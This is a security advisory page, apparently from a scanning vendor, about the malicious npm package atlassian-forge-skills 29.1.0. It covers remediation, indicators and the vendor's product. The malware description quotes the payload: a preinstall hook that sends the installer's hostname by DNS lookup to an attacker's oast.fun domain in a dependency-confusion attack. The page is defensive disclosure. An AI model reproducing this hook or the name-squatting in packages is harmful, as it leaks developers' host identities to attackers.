Which versions of atlassian-forge-skills are malicious?

The following npm versions of atlassian-forge-skills are flagged malicious: 29.1.0. Treat any of these as compromised.

How do I remediate atlassian-forge-skills if I installed it?

Remove atlassian-forge-skills from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is atlassian-forge-skills part of a known attack campaign?

Yes — atlassian-forge-skills is associated with the IN-MAL-2026-006753 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect atlassian-forge-skills in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking atlassian-forge-skills and packages like it before any post-install script runs.

Malicious package

atlassian-forge-skillsnpm

Malicious code in atlassian-forge-skills (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5891

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall atlassian-forge-skills

What this malware does

Package impersonates an internal Atlassian Forge dependency (unscoped name atlassian-forge-skills, description 'Internal package', generic author 'Team'). package.json declares "preinstall": "node index.js", which fires automatically on npm install. index.js lines 6-8 read os.hostname() and embed it as a subdomain of a hardcoded interactsh OAST receiver: const targetDomain = ${hostname}.zcagyqqmvnmgsklstrrr6xo2715tov7wz.oast.fun; dns.lookup(targetDomain, () => {});. The DNS lookup is sufficient to leak the installer's hostname to the attacker-controlled oast.fun DNS server — the canonical dependency-confusion payload, where any developer or CI pipeline that mistakenly resolves an internal Atlassian package name to this public registry entry exposes host identity for follow-on targeting.

Malicious versions

1 flagged

29.1.0

Indicators of compromise (SHA-256)

0ca0f4b99cda621977551550ed678ad77ee82827714acb9d08534f53b0642e3c

Frequently asked questions

No. atlassian-forge-skills on npm has been identified as a malicious package (version 29.1.0 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006753

References

npmjs.com

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection